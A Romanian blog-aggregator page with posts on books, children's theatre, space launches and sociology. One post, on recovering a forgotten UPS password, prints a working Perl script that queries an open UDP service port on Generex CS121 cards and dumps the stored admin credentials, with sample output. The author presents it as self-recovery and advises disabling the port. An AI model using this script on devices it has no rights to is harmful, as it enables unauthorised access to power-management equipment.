revistaforumwikiarea51planetlinuxfestgalerie fotochatftp rss
 

vineri 12 februarie 2016

Răzvan-Teodor Coloja

…şi încă o recenzie ”Pangeea, toamna”

vineri 12 februarie 2016, 13:47

Literatură  pangeea  pangeea toamna 

Azi mi-a picat în mână această recenzie a ultimului meu roman. Mi-a plăcut mult de tot aşa că pun link-ul şi aici.

Pangeea, toamna e ca o doză bună. O iei, acționează, te transportă într-o altă lume și n-ai mai vrea ca efectul ei să treacă. […] Pangeea, toamna este un roman de stare, și ce stare!, care pur și simplu te ademenește în lumea lui, iar dacă vreți să aflați cam care e viața unui artist, citiți-l. O să vă spună multe…

Alexandra Medaru

joi 11 februarie 2016

Alexandru Burlacu

Șmecheri nemți mai sunt chinezii ăștia…

joi 11 februarie 2016, 18:56

D'ale mele  Linux  Terminal  AEG  CS121  Eaton  Generex UPS Web/SNMP-Manager CS121 Generex  Legrand  Masterguard.  perl  Rittal  UPS  UPS Web/SNMP-Manager 

Mai ales atunci când îi conving pe francezi să copieze un soft american pe care să-l facă să funcționeze pe un echipament german.

Acum puțin timp a venit momentul să schimbăm ups-urile din firmă, nu de alta dar prietenii de la Enel sau cum s-or mai numi acuma au prostul obicei de a opri alimentarea cu energie electrică din când în când… sau, mai grav, nu o opresc, dar nici nu trimit 220V pe sârme…

Și pe lângă noile echipemante și-a găsit locul și unul mai deștept, care să vorbească cu noi (când e cazul), să știe să trimită un email, notificare ceva când se întâmplă lucruri neprevăzute, etc.

Partea aia de deșteptăciune din ups-ul cu pricina poartă numele de CS121, e făcută de nemții de la Generex și echipează mai toate ups-urile de la Eaton, Rittal, AEG, Legrand și Masterguard. Un echipament serios și sănătos așa în felul lui, dar având firmware (custom) și softul făcute de francezi, copiind până la un punct o aplicație deja cunoscută, făcută de americani (franțuziți și ei acuma) la momentul când sloganul acestora din urmă era “Legendary Reliability”.

Bun… Ca de obicei, primul lucru pe care-l fac atunci când îmi pică o jucărie nouă în mâini… schimb parolele (că tot spunea Simona Tache acum ceva vreme că la noi, bărbații, fără parole, viața e pustiu)

Și pun eu frumos acolo parola de bază AnaNuMaiAreMereSocSiGroaza!!!@#$00&72, scriu cuminte aceeași parolă și în al doilea câmp ca să confirm, primesc felicitări pentru cât de inteligentă îmi e parola și sigură etc, salvez și când să întru iar în administrare…. ghinion… iaca parola nu e aia bună. Mai încerc odată, mai scriu toată parola (că de, să nu fie vreun caracter aiurea prins între copy și paste și-mi pic doctoratul din cauza lui)… nimic. Parolă incorectă.
Înjur eu zdravăn tastatura, localele și ce-mi mai vine-n cap că ar putea fi motiv de a fi salvat o parolă greșită, și la final, ca orice inginer care se respectă, pun mâna pe manual să văd cum pot reseta parola.
Ajung eu la pagina care povestește de cât de sigur e mecanismul lor și cum să folosești parole sigure bla, bla, bla, iar la final găsesc o notă mică care zice pe scurt că dacă ai “uitat” (fain că uitat chiar e între ghilimele) parola, poți în baza seriei echipamentului să ceri una nouă direct de la producător.
Înghit în sec, pun mâna pe telefon și sun la cel care mi-a vândut echipamentul… “știi, eu mi-s mai prost așa și nu mai știu ce parolă am pus, poți să-mi zici și mie cum se resetează?”. După câteva minute în care el a sunat la rândul lui la importator/etc. vine răspunsul: “Trimite-mi un email, în care să povestești ce ai pățit, eu îl dau la importator, care-l va trimite la producător care….” OK, îmi zic în barbă, așadar fiind vorba de francezi la mijloc, probabil că săptămânile astea nu mai accesez jucăria… și încep să caut informații despre cât ar putea dura operațiunea.

Și căutând eu pe net, ce aflu?

Că placa cu pricina are un port de service, prin care își aduce update-urile de firmware, intră francezii să îți rezolve problemele etc. și care, culmea (sau nu) stă așa frumos deschis pentru toată lumea care și-ar dori să-l probeze…

Și pentru a testa există și un mic script făcut în perl, care odată rulat afișează mai tot ce te-ar putea interesa… cam așa:

$./upssearch.pl $IP

UPS: CS124-16M32M, ROM-Version: 2.3.4(pduc) - Aug 27, 2010

Target system parameters (current):
Default Protocol : TCP/IP
Default Driver : Ethernet
Mac address : 00-00-00-00-00-00
IP address : XX.XX.XX.XX
Net Mask : 255.255.250.192
Default Gateway : XX.XX.XX.XX
DHCP : 0.0.0.0
DNS : 0.0.0.0
Port for tools : 4000

Searching login
USER: admin, PASS: AnaNuMaiAreMere, ACCOUNT: none

Bucuros nevoie mare că mi-am “hăcuit” propriul echipament, aflu că de fapt nu băgasem eu greșit parola inițială ci mândrețea de soft are limitare la X caractere, iar deși nu spune nicăieri și validează ca fiind corectă orice introducere, stripuiește șirul de caractere la acel X… Multă sănătate poporului programator francez care m-a făcut să-mi pierd câteva ore pe tema asta.

Conținutul scriptului de care pomeneam mai sus este (nu de alta dar poate mai pică și alții în situația asta):

#!/usr/bin/perl -w
use IO::Socket;
use constant MAXBYTES => scalar 1024;

$socket = IO::Socket::INET->new( PeerPort => 4000,
PeerAddr => $ARGV[0],
Type => SOCK_DGRAM,
Proto => 'udp');

$socket->send("");
$socket->recv($inline, MAXBYTES);
print "UPS: $inline \n";

$socket->send("show syspar");
$socket->recv($inline, MAXBYTES);
print "$inline\n";

print "Searching login\n" ;
$socket->send("start");
$socket->recv($inline, MAXBYTES);
$socket->send("cd /flash");
$socket->send("type ftp_accounts.txt");

while($socket->recv($inline, MAXBYTES)) {
if($inline =~ /admin/ig) { print $inline; exit; }
}

sleep(10);

Recomandarea mea, dacă vă pică astfel de echipamente pe mână, țineți portul de service dezactivat. Și nu folosiți parole complicate, bine? :)

Alexandru Burlacu

“Fata Babei și Fata Moșneagului” – un nou super spectacol marca Zurli

joi 11 februarie 2016, 18:00

D'ale mele  #eusuntzurli  #teatrulzurli  D'ale mele. Zurli  Fata Babei și Fata Moșneagului  Premieră  Teatrul Zurli  Zurli 

Există multe metode de a trezi și scoate din casă fetele mele, însă de departe cea mai eficientă este fraza “Hai că întârziem la Zurli”.

Parola “Zurli” deschide ochi, aduce zâmbete și chicoteli instant… și are puterea magică de a-mi duce la ușă, gata îmbrăcate de plecare fetele în câteva minute.

Și asta indiferent dacă e vorba de Gașca Zurli sau Teatrul Zurli… entuziasmul se manifestă la fel în ambele cazuri.

IMG_20160206_104125

Sâmbătă dimineața am avut șansa de a fi prezenți la premiera piesei “Fata Babei și Fata Moșneagului”, o nouă adaptare de-a Mirelei Retegan în stilul consacrat Zurli – stil care îmbină educația cu veselia într-un mod interactiv devenit deja “marcă înregistrată”.

Odată ajunși la Teatrul de pe Lipscani, am fost primiți de Tanti Prezentatoarea, Zâna Bună și ajutoarele ei, care au făcut ca imediat ce-am intrat în foaier să avem parte de atmosfera caldă “de acasă”, fetele mele “m-au pierdut” și au fugit la joacă, iar eu am rămas cu grupul tăticilor Zurli, oameni super faini alături de care timpul trece mult prea repede.IMG_20160206_103608

Dar subiectul postării este piesa de teatru… Ei bine, această punere în scenă a “Fata Babei și Fata Moșneagului” este de departe cea mai faină variantă pe care am avut ocazia să o văd până acum.

IMG_20160206_111600

Talentul celor de pe scenă, acompaniat de ilustrația muzicală extraordinar de bine făcută, fac această piesă să fie una extraordinar de caldă, plăcută, educativă și… românească.

Costumele populare ale actorilor, decorul simplu dar plin de elemente definitorii ale culturii populare românești, împreună cu muzica și felul în care s-a interpretat această piesă aduc bucurie și emoție atât în sufletul copiilor cât și al adulților.

Așadar, Vero Căliman, Ruxandra Coman, Krista Andreea Bălan, Alex Stama, Răzvan Marina, Anca Cernea (responsabilă cu scenografia), Marius Aștilean (“vinovat” de muzică), Vadim Rusu (regizorul acestui spectacol) și nu în ultimul rând Mirela Retegan (care a făcut adaptarea acestei piese și fără de care acest articol nu ar fi avut subiect) – Bianca, Alexia și cu mine vă mulțumim din suflet pentru bucuria pe care ne-ați adus-o în suflet cu “Fata Babei și Fata Moșneagului”.

miercuri 10 februarie 2016

Parsec

Delta IV și NROL-45

miercuri 10 februarie 2016, 14:13

Articole  delta IV  NRO  NROL-45  ULA  Vandenberg 

Racheta Delta IV a concernului United Launch Alliance va debuta în acest an cu o lansare a satelitului de spionaj NROL-45 pentru National Reconnaissance Office (NRO). Dacă lansarea Atlas V de vineri a avut loc de la Cape Canaveral, de această dată Delta IV va folosi rampa de lansare numărul 6 de la baza forțelor aeriene Vandenberg din California. De aici au loc lansările de sateliți americani care trebuie să ajungă pe orbită polară, iar un satelit de spionaj (sau de observare a suprafeței Pământului) poate beneficia de pe urma unei orbite polare pentru că poate trece pe deasupra unui punct la exact aceeași oră solară, având condiții de iluminare identice la aceeași oră, lucru care este de dorit pentru o supraveghere pe termen lung a unei anumite zone. În plus, o orbită polară asigură o acoperire mai mare, aproape totală, a suprafeței planetei.

Racheta Delta IV, transportată la Vandenberg pentru lansarea de astăzi
Racheta Delta IV, transportată la Vandenberg încă din noiembrie 2014, pentru lansarea de astăzi

Baza de la Vandenberg a fost pregătită inițial pentru misiuni spațiale cu echipaj din cadrul programului Forțelor Aeriene, denumit MOL (Manned Orbiting Laboratory) și care urma să se desfășoare în paralel cu cel civil al NASA. Deși au fost selectați astronauții care urmau să zboare folosind o capsulă Gemini modificată, programul a fost în cele din urmă abandonat înainte de a avea loc un zbor cu echipaj. Ulterior, complexul de la Vandenberg a fost pregătit pentru lansări pe orbită polară a navetei spațiale, rampa din California fiind a doua locație din care navetele spațiale puteau decola. Însă chiar dacă o misiune a fost planificată și gata de zbor (primind chiar și un indicativ, STS-62A), după accidentul navetei Challenger, toate planurile pentru lansări de la Vandenberg au fost anulate. Dacă găsiți poze pe internet cu o navetă spațială pregătită pentru lansare pe rampa de la Vandenberg, este vorba despre naveta Enterprise, care a efectuat acolo o serie de teste, însă nu a decolat niciodată spre spațiu. Însă pista de la Vandenberg a fost folosită de mai multe ori pentru aterizarea navetei spațiale, când condițiile meteo din Florida erau nefavorabile. Cel mai recent, la Vandenberg a aterizat mini-naveta spațială militară X-37B, în 17 octombrie 2014, după nu mai puțin de 675 de zile petrecute pe orbită.

Revenind la lansarea de astăzi, satelitul din cadrul misiunii NROL-45 este cel mai probabil al patrulea satelit din seria Topaz, construit de Boeing, o variantă avansată a foștilor sateliți de spionaj Lacrosse, lansați pe orbită între 1998 și 2005 de racheta Titan 4 și de naveta spațială Atlantis (puteți urmări un clip la ULA în care este prezentată montarea satelitului). Toate lansările Topaz au avut loc de la Vandenberg și a cincea și ultima din această serie va avea loc în cursul acestui an sau în 2017. Primul satelit Topaz a fost lansat în 2010 de o rachetă Atlas V (NROL-41), urmând în 2012 un lansator Delta IV Medium (NROL-25), pentru ca în 2013 să se revină la Atlas V (NROL-39). Practic orice încărcătură a unei rachete Delta (în afară de configurația Heavy) poate fi transportată mai ieftin la bordul unui propulsor Atlas V, însă forțele aeriene SUA preferă să aibă la dispoziție două variante de lansare, compuse din două rachete diferite, pentru siguranța că pot continua lansările și dacă unul dintre acestea devine indisponibil (datorită unei anchete care urmează unui accident, de exemplu). În acest scop, United Launch Alliance este subvenționată pentru a menține linia de producție Delta IV și a asigura astfel o alternativă la Atlas, alternând astfel vehiculele folosite pentru lansare. În viitor, când ULA va produce Vulcan, probabil Atlas V și Delta IV vor fi retrase din uz și Falcon 9 va fi folosit ca alternativă, însă acest lucru nu se va întâmpla înainte de 2020.

După lansarea de astăzi, ULA începe pregătirile pentru lansarea celei mai puternice rachete rămasă în uz după retragerea navetei spațiale: Delta IV Heavy care în 12 mai este programată să lanseze un nou satelit de spionaj (probabil din seria Orion, plasați pe orbită geostaționară), în cadrul misiunii NROL-37, care va decola de la Cape Canaveral. O nouă lansare de la Vandenberg dedicată NRO va avea loc la 1 decembrie, când o rachetă Atlas V va avea de executat misiunea NROL-79.

Lansarea de astăzi este a 9-a misiune executată de Delta IV pentru NRO, dintr-un total de 31 de zboruri. NRO a folosit de 12 ori lansatorul Atlas V, dintr-un total de 61 de zboruri ale acestuia. Delta IV, la fel ca și Atlas V, poate fi configurată în funcție de nevoile clientului. Astfel, Delta IV vine în mai multe variante Medium, trei variante Medium+ sau Heavy. Varianta Medium+ vine cu 2 sau 4 boostere suplimentare cu combustibil solid, atașate de prima treaptă. Astăzi, racheta este în configurația Medium+ (5,2), adică carenajul are un diametru de 5 metri (partea din vârful rachetei care protejează satelitul până la părăsirea atmosferei, acesta poate fi și de 4 metri) și două boostere suplimentare ajută prima treaptă. Spre deosebire de Atlas V, motoarele rachetei Delta IV sunt produse în SUA. Prima treaptă este propulsată de RS-68A, iar a doua treaptă de RL-10 (ambele ard oxigen și hidrogen lichid și sunt produse de Pratt & Whitney Rocketdyne).

Dacă doriți să vizionați în direct lansarea de la ora 13:39, webcastul celor de la United Launch Alliance începe cu 20 de minute înainte și poate fi urmărit pe site-ul oficial al companiei.

Articolul Delta IV și NROL-45 apare prima dată în parsec.ro.

Răzvan-Teodor Coloja

De la neo-marxism la Palahniuk, prin phreaking

miercuri 10 februarie 2016, 13:52

Literatură  Sociologie  chuck palahniuk  Durkheim  hacking  literatura  Marx  marxism  phreaking  sociologie  theodor adorno  transgressive fiction 

Care este legătura dintre Chuck Palahniuk, curentul Generation X şi Şcoala de sociologie din Frankfurt? Aparent legăturile sunt diverse şi în acest articol voi încerca să vă arăt că există o paralelă între literatura transgresivă care se doreşte a fi un răspuns revoluţionar la problemele societăţii de consum şi sociologia neo-marxistă, în special teoriile lui Theodor Adorno.

După Cel De-al Doilea Război Modial, o mână de filosofi şi sociologi evrei s-au retras în Statele Unite şi au înfiinţat un curent numit ”teorie critică”. E dificil să defineşti printr-un singur lucru teoria critică ca şi curent în sociologie, dar dacă ar fi să facem o încercare, aceea ar rezulta în ”o reacţie împotriva oricărui curent de autoritate”. Şi aici nu se înţelege anarhie sau exclusiv curente politice. Teoria critică lupta împotriva ideii de monopol asupra maselor atât prin factori economici cât şi ideologici. Erich Fromm, Theodor Adorno şi Herbert Marcuse au încercat să combine concepte marxiste cu idei freudiene ca să alcătuiască un nou grup de marxişti care se opuneau modului în care marxismul fusese interpretat de sovietici şi alte câteva state socialiste ale lumii. Înlăturaţi totalitarismul din societăţile sovietice sau prieten-sovietice şi adăugaţi un strop de idealism şi rezultă teoria critică.

Membrii Şcolii din Frankfurt considerau că anumiţi factori economici, filosofici, politici şi sociali au dus la transformarea radicală a societăţii din cele două mari puteri ale lumii de pe la mijlocul anilor 1950. Dacă în fosta URSS ideea de bază era socialismul, în SUA se încerca manipularea maselor prin individualism şi un spirit al înteprinzătorului capitalist care au dus la creşterea consumerismului. Conform celor din curentul teoriei critice, consumerismul a dus la un fals sentiment de satisfacţie a maselor. Puterea banului, produsele ieftine şi create pe bandă rulantă, dorinţa de a acapara cât mai mult şi a dezvolta avere – toate acestea au deformat societatea vestică până în punctul în care controlul maselor, în pofida steagului democraţiei, semăna cu cel impus de regimurile facsiste şi comuniste.

Conceptul de alienare al lui Marx şi cel de anomie al lui Durkheim se împleteau destul de bine cu noul curent. Deşi pe la jumătatea anilor 1970 teoria critică a murit odată cu decesul lui Ardono şi a altor câţiva acoliţi ai săi, ideea de distrugere a conştiinţei şi voinţei maselor prin consumerism şi capitalism a rămas. Progresul tehnic, cultura maselor şi birocraţia înrobesc consumatorul. Clasa conducătoare devine din ce în ce mai puternică pe măsură ce clasele aflate la periferia societăţii sunt sortite eşecului într-un mediu competitiv precum capitalismul. Avem deci o paralelă cu forurile superioare ale societăţii socialiste şi antiteza în care acestea se află cu masele de muncitori şi ţărani care formau baza piramidei comuniste. Asistăm prin ideile lui Adorno la o critică a democraţiei.

Critica democraţiei nu era o idee nouă în perioada postbelică. Machiavelli prezisese că masele nu vor reacţiona bine în faţa libertăţii de decizie. Monarhiile decad în aristocraţie, aristocraţia în democraţie iar ultima în anarhie. În 1835 şi 1840 Alexis-Charles-Henri Clérel de Tocqueville publică ”Democraţia în America”, o lucrare inspirată de ceea ce a văzut în călătoria lui spre noul tărâm. De Tocqueville critică şi el democraţia, societatea de consum şi deplânge soarta omului de jos, prins într-o luptă inegală cu cei aflaţi deja în vârful piramidei capitalismului. Alexis de Tocqueville critică nu doar societatea de consum, democraţia dar şi capitalismul. Invocă factori psihologici care duc la un grad mare de insatisfacţie în rândul populaţiei, în special în rândul celor a căror soartă nu a decurs aşa cum plănuiau. Nu au ajuns bogaţi, faimoşi, nu au reuşit să strângă avere. Critica a ceea ce ulterior a ajuns să fie numit drept ”visul american” s-a metamorfozat parţial şi în lucrările lui Theodor Adorno şi în discuţiile dintre primii membri ai Şcolii din Frankfurt: Friedrich Pollock, Otto Kirchheimer, Leo Löwenthal şi Franz Leopold Neumann.

Adorno şi Horkheimer critică într-o carte modul în care arta a s-a denaturat sub capitalism devenind doar un bun de consum. Filmele, cărţile, muzica – toate fuseseră influenţate de avansul tehnologiei şi s-au adaptat cerinţelor unei societăţi care dorea totul mai rapid şi mai eficient.

Revenind la conceptele de anomie şi alienare ale lui Durkheim, respectiv Marx, acestea două crează o detresă în indivizii din societate. Depresia, alienarea, anxietatea – toate acestea sunt produse ale societăţii de consum şi ale globalizării. Furia individului împotriva sistemului este exprimată în literatură prin curentul Generation X. Douglas Coupland, Irvine Welsh, Chuck Palahniuk – temele principale ale acestor autori sunt revolta împotriva normelor, lupta împotriva societăţii de consum şi critica acestei societăţi. ”Fight Club” descrie cel mai bine extremele acestei lupte şi există paralele evidente între ideile lui Adorno şi Alexis de Tocqueville şi mesajul transmis de Chuck Palahniuk. Maimuţele proiectului Mayhem distrug opere de artă modernă (produse ale societăţii de consum), Tyler Durden se revoltă împotriva curentului consumerist prin tirade aprinse iar furia izvorâtă din alienare se metamorfozează plastic în lupte corp-la-corp, acte de anarhie şi o idelologie care propovăduieşte o reîntoarcere la un mod de viaţă mai simplist. Aceleaşi teme – mai slab expoatate, ce-i drept – apar şi în lucrările lui Welsh, Clevenger şi Coupland. Bret Easton Ellis atinge şi el ideea sinteticului societăţii de consum în cărţi precum ”Glamorama”, ”Imperial Bedrooms” sau ”American Psycho”. Critica lui Ellis este mai subtilă, nu atât de directă. Atinge un nivel fin al ironiei pe care-l deduci doar din modul în care personajele se raportează la mediul lor înconjurător şi unul la celălalt.

Neo-marxismul vizează o societate americană coordonată de regulile consumului şi ale capitalismului în general. Deşi curentul teoriei critice nu mai are reprezentanţi atât de acerbi în sociologie precum avea în anii 50-70, aparent el trăieşte prin filiera literaturii transgresive.

Putem numi promotorii Generaţiei X drept neo-marxişti? Cu siguranţă Theodor Adorno ar fi fost de acord cu o asemenea afirmaţie. Paralelele dintre ”Democraţia în America” a lui Alexis de Tocqueville şi ”Fight Club” a lui Chuck Palahniuk sunt uimitoare. Liantul care leagă neo-marxiştii de literatura transgresivă, acel gol reprezentat de anii 80 este umplut de subcultura hackerilor şi a phreakerilor americani (şi germani din Chaos Computer Club). E-zine-urile care circulau în anii 80 pe BBS-uri te învăţau cum să lupţi împotriva consumerismului şi a societăţii în general. Transgresivul e acolo în reviste precum ”Phrack” şi cărţi precum ”The Anarchist’s Cookbook”: crearea de bombe artizanale, moduri de a deschide lacăte cu şperaclul, cum să înşeli Ma’Bell (compania de telefonie Bell Labs din SUA) prin manipularea tonurilor de apel în vederea obţinerii de teleconferinţe gratuite. Citisem ”The Anarchist’s Cookbook” de William Powell prin anii 90, înainte să citesc Fight Club ori să văd filmul. Este evident că Palahniuk s-a inspirat mult din această carte în acele părţi din ”Fight Club” în care descrie metode de manufactură a explozibililor din substanţe pe care le poţi găsi în casă sau la supermarket. Anarhişti precum autorul Abbie Hoffman (”Steal This Book”), hackeri şi phreakeri precum Craig Neirdorf (”Knight Lightning”) ori ”Taran King”, cei din vechiul club ”Legion of Doom” – ei sunt adevăraţii Tyler Durden ai anilor 80.

Iată cum, de la scrierile lui Machiavelli, trecând prin Alexis de Tocqueville, sărind câţiva ani prin Theodor Adorno şi Şcoala din Frankfurt ajungem la Palahniuk după ce trecem prin reviste online underground precum ”Phrack”, presărate de articole semnate nu ”Robert Paulson” ci ”Erik Bloodaxe” sau ”Taran King”.

Mi se pare minunată această legătură dintre curentele politice ale secolului curent, sociologie, subcultură urbană şi literatura trasgresivă. Şi articolul ăsta îl doream scris de ceva vreme.

marţi 9 februarie 2016

Alexandru Burlacu

Piesa zilei – ALTAR – Rapsodia Românească

marţi 9 februarie 2016, 19:28

Muzica ce-mi place  Altar  Andy Ghost  Rapsodia Românească  rock 

În 2016 se împlinesc 10 ani de când Altar, una din trupele mele preferate luptă pe față și împotriva “manelizării” politico-sociale de la noi.

Așa că astăzi, piesa zilei este Rapsodia Românească.

Andy Ghost te salut și te/vă aștept în București.

Respect!

Răzvan-Teodor Coloja

Fosta viaţă a lui X

marţi 9 februarie 2016, 18:06

Uncategorized 

Logodnica mea urmează să aibă întâlnirea de y de ani de la terminarea gimnaziului. Din când în când îmi spune cu cine din vechea ei clasă a mai vorbit. Care fost coleg pe unde e plecat. Cine plănuieşte să vină şi cine nu. Şi din discuţia cu o astfel de fostă colegă a întrebat despre X, tot fost coleg. Din câte am înţeles, X era puţin altfel în şcoală. Nu învăţa bine, se trăgea dintr-o familie dezorganizată. Fosta colegă i-a spus logodnicei mele că l-a văzut într-o zi pe X. Era pe stradă, căuta într-o ghenă de gunoi. Şi nu ştiu de ce dar am simţit că se rupe ceva în mine când am auzit povestea. Pentru că e ciudat să fii coleg de clasă cu cineva 4 ani de zile, să ieşi în pauze, să schimbi teme, copiezi la extemporal, râzi la ore. Aţi făcut aceleaşi ore de geografie, aţi văzut aceleaşi feţe, aţi auzit acelaşi clopoţel. Şi ani mai târziu omul a ajuns să trăiască din ce aruncă alţii, să caute prin ghene de gunoi. Fosta colegă a logodnicei mele i-a spus că nu l-a abordat atunci pe tip. I-a fost jenă. Ce să-l întrebe? Cum mai e? Să depene amintiri? Să plece fiecare apoi spre drumul lui, X în jos iar ea în sus?
Nici eu nu ştiu ce-aş fi făcut în locul ei. Dar am simţit nevoia să scriu despre asta.

Alexandru Burlacu

Puterea obișnuinței…

marţi 9 februarie 2016, 17:59

D'ale mele  claxon  din trafic  opel  secunda  semafor  trafic 

Se spune că milisecunda este timpul care trece de când se schimbă semaforul în verde și până se aude primul claxon…

Ei bine, în dimineața mi-a fost dat să văd prima dată cum lucrează “puterea obișnuinței”… Sună așa a “Times New Roman” dar e adevărat – deși era primul (și singura mașină de altfel) la semafor un utilizator de Opel a claxonat fix în mili-nano-micro-secunda în care s-a făcut semaforul verde, apoi a plecat cu scârț’ de roți, că mai avea 200 de metri până la următorul semafor și îi era probabil frică să n-ajungă ultimul… în singurătatea sa.

Câtă frustrare să aduni în tine ca să ajungi să te manifești astfel? Greu de zis…

luni 8 februarie 2016

Parsec

Buletin cosmic (IV)

luni 8 februarie 2016, 18:58

Articole  atlas v  Chang'E 3  Coreea de Nord  Edgar Mitchell  GLONASS-M  gps  Journey to Mars  juno  Kwangmyŏngsŏng  Luxemburg  orion  SSI  Unha  Yutu 

Capsula Orion, programată să zboare în misiunea inaugurală SLS din a doua jumătate a anului 2018, a ajuns la Kennedy Space Center în Florida. Prima capsulă Orion a fost lansată în 5 decembrie 2014, folosind o rachetă Delta IV Heavy și, după două orbite în jurul Pământului, a încheiat cu succes misiunea test a noului vehicul care urmează să transporte oameni în spațiu (Orion Exploration Flight Test-1, EFT-1). Exploration Mission 1 (EM-1) urmează să folosească o variantă preliminară a sistemului SLS (Block 1) pentru a transporta capsula Orion într-un zbor circumlunar, similar cu traiectoriile misiunilor Apollo 8 și Apollo 13, pentru a testa mult mai în amănunt capsula. Orion este singurul proiect care a supraviețuit din fostul program Constellation, în care NASA își propunea să revină pe Lună. Proiectul a fost considerat ulterior nesustenabil, dar capsula Orion a fost păstrată pentru a fi folosită ca barcă de salvare pentru Stația Spațială Internațională, unde în prezent acest rol îl joacă capsulele rusești Soyuz. Nici noul program, Journey To Mars nu dă semne că ar rezista unei noi schimbări în administrația americană. Viitorul misiunilor NASA este destul de incert, mai ales după retragerea Stației Spațiale Internaționale.

Miercuri, Iuri Malenchenko and Sergei Volkov au efectuat cu succes a 42-a activitate extravehiculară, ieșind în afara Stației Spațiale Internaționale pentru a recupera câteva experimente desfășurate dincolo de modulele presurizate. A fost a 193-a ieșire în afara SSI (totalizând un număr de 1204 ore și 48 de minute), a 6-a pentru Malenchenko și a 4-a pentru Volkov. Cu ocazia aniversării Zilei Victoriei în Rusia, cei doi au lansat pe orbită un flash drive ce conținea mesaje cu ocazia acestei zile.

Tot miercuri, Luxemburg a prezentat o inițiativă guvernamentală în domeniul spațial, direcționată spre explorarea resurselor naturale din asteroizi, pentru a sprijini companiile europene din domeniu și pentru a limita exodul acestora spre Statele Unite a celor interesați de acest domeniu. Mai multe detalii puteți afla de pe site-ul oficial al acestei inițiative, www.SpaceResources.lu.

Joi, sonda Juno, aflată în drum spre Jupiter, a efectuat o mică manevră de corecție a traiectoriei de zbor, pentru a fi sigură că este pe drumul cel bun. La începutul lui iulie, gravitația lui Jupiter va captura proba, care se va înscrie pe o orbită polară în jurul planetei.

Imaginile de înaltă rezoluție, capturate de Chang’e E 3 și Yutu, făcute publice recent de Agenția Spațială din China (20 ianuarie 2016), sunt găzduite și de site-ul The Planetary Society. Au fost grupate în două colecții: imaginile obținute de camera roverului Yutu și cele capturate de camera platformei staționare Chang’E 3. Colecția întreagă (35 GB de date brute), în format PDS, este disponibilă și ea, dar dacă nu vă descurcați cu limba chineză, puteți încerca un ghid al acestei colecții, creat tot de The Planetary Society.

Atlas V a început cum nu se poate mai bine aglomeratul an 2016 pentru United Launch Alliance cu o splendidă lansare vineri, în care a fost transportat pe orbită ultimul satelit GPS de a doua generație. Urmează în curând seria de lansări dedicate sateliților GPS de a treia generație. Dar despre Atlas V și United Launch Alliance voi vorbi mai multe în câteva zile.

Edgar Mitchell, unul dintre cei 12 oameni care au pășit pe Lună, a murit vineri. Avea 85 de ani. Au mai rămas doar 7 persoane în viața pe acest Pământ care au pășit pe o altă lume și s-au întors să ne povestească despre aventura lor. Apollo 14 devine astfel prima misiune Apollo din care nu mai avem în viață nici unul dintre cei trei membri: Alan Shepard a murit în 1998, iar Stuart Roosa în 1994.

În noaptea de vineri spre sâmbătă am avut parte de două lansări, la distanță de câteva minute între ele: o rachetă Soyuz a lansat un satelit GLONASS-M, pentru a consolida constelația de geolocalizare rusească, dar și o lansare din… Coreea de Nord. Despre aceasta din urmă, am scris ieri un articol ceva mai detaliat.

Articolul Buletin cosmic (IV) apare prima dată în parsec.ro.

Parsec

Câteva detalii despre Kwangmyŏngsŏng-4

luni 8 februarie 2016, 09:23

Noutăţi 

Planificată pentru 8 februarie, lansarea rachetei nord-coreene a fost devansată cu 24 de ore din motive încă necunoscute. Cert este că lansarea rachetei Unha-3 de la baza din Sohae a fost una de succes, încărcătura acesteia, satelitul Kwangmyŏngsŏng-4, ajungând pe orbită. Masa satelitului a fost estimată de Coreea de Sud la aproximativ 200 de kilograme. Acum, dacă acesta este sau nu funcțional este o cu totul altă discuție, dar instituții militare din Statele Unite au confirmat că satelitul nord-coreean orbitează Pământul. Deși regimul de la Phenian susține că lansarea a avut un caracter strict științific (satelitul Kwangmyŏngsŏng-4 ar fi unul dedicat obsevațiilor suprafeței Pământului), alte state sunt de părere că acesta a fost de fapt un test al unei rachete balistice cu rază lungă de acțiune (10000 km). Iar acest lucru vine la o lună după ce Coreea de Nord a testat din nou o armă nucleară (al patrulea astfel de test din 2006 și sunt deja zvonuri că se pregătește un al cincilea test). Racheta Unha-3 este denumită de această dată de Coreea de Nord Kwangmyŏngsŏng, însă este același tip de rachetă care în trecut a fost cunoscut sub numele Unha-3.

Japonia s-a arătat îngrijorată de lansare și a declarat că va distruge racheta dacă va prezenta un pericol pentru propriul teritoriu, însă deși aceasta a trecut deasupra insulei Okinawa, armata niponă nu a întreprins nici o acțiune în acest sens. Din nou, este o discuție separată dacă Japonia ar fi putut doborî cu succes din prima încercare racheta nord-coreeană.

USSTRATCOM notează ora 02:29, la opt minute după o lansare Soyuz 2-1b a Rusiei (care a avut loc de la cosmodromul Plesetsk în vederea împrospătării constelației de sateliți proprii de poziționare globală cu un nou satelit GLONASS-M). Satelitul lansat astăzi este a doua încercare reușită pentru Coreea de Nord de a plasa o  încărcătură pe orbită, după tentativa din 12 decembrie 2012 când Kwangmyŏngsŏng-3 a ajuns pe orbită, dar nu a putut fi controlat. Coreea de Nord a devenit în 2012 a zecea națiune capabilă să lanseze prin forțe proprii sateliți, statut confirmat și prin lansarea de astăzi.

Satelitul Kwangmyŏngsŏng-4 a fost plasat pe o orbită heliosincronă polară (adică satelitul trece de fiecare dată deasupra unui anumit punct de pe suprafața Pământului la exact aceiași oră solară și, în plus, orbita acestuia trece pe deasupra polilor) cu înclinația orbitală de 97.5 grade și o orbită 465 x 502 kilometri. De această dată orbita este mai circulară decât cea a lui Kwangmyŏngsŏng-3 din 2012 (495 x 588 km). Pe orbită a mai fost identificat încă un obiect rezultat în urma lansării, care este probabil treapta secundară a rachetei Unha-3 și care se mișcă pe o orbită 433 x 502 km.

Liderul nord-coreean Kim Jong-Un a urmărit lansarea de la centrul de operațiuni Sohae, iar televiziunea de stat a prezentat lansarea în maniera deja caracteristică.

kws4-01.jpg_thumb kws4-02.jpg_thumb kws4-03.jpg_thumb kws4-04.jpg_thumb kws4-05.jpg_thumb kws4-06.jpg_thumb kws4-07.jpg_thumb kws4-08.jpg_thumb kws4-09.jpg_thumb kws4-10.jpg_thumb kws4-11.jpg_thumb kws4-12.jpg_thumb kws4-13.jpg_thumb kws4-14.jpg_thumb kws4-15.jpg_thumb kws4-16.jpg_thumb kws4-17.jpg_thumb Fig4 Fig2 Fig2_Sohae-052815-990x636 Kwangmyŏngsŏng-4

Articolul Câteva detalii despre Kwangmyŏngsŏng-4 apare prima dată în parsec.ro.

vineri 5 februarie 2016

Parsec

Zodia sateliților de geolocație

vineri 5 februarie 2016, 18:20

Noutăţi  BeiDou  galileo  glonass  gps  IRNSS 

